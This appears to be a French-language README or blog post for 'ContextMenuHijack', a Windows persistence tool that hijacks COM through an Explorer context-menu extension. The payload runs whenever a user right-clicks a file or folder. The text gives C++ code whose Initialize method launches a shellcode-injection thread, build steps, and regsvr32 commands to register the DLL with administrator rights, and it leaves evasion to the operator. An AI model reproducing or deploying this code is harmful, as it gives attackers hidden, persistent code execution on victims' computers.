
Exécuter un payload à chaque clic droit sur un fichier/dossier dans le menu de l'explorateur pour la persistance
Cette idée originale qui m'a inspiré vient de @NinjaParanoid :
ContextMenuHijack est une technique de persistance simple qui utilise le détournement COM basé sur le comportement humain : lorsque vous faites un clic droit sur un fichier/dossier dans l'Explorateur de fichiers pour ouvrir le menu contextuel, il exécute en même temps le beacon que nous avons spécifié.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}
Il vous suffit de charger le fichier solution (.sln) et de le compiler. Il est important de savoir que vous avez besoin de privilèges d'administrateur pour utiliser cette technique de persistance. Une fois que vous avez fait tout cela, il vous suffit d'enregistrer le fichier DLL dans le registre avec regsvr32 :
regsvr32 "C:\path\to\ContextMenuHijack.dll"
si vous voulez le désinstaller, utilisez simplement le flag
/u
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

explorer.exe, c'est à vous d'utiliser vos propres techniques d'évasion
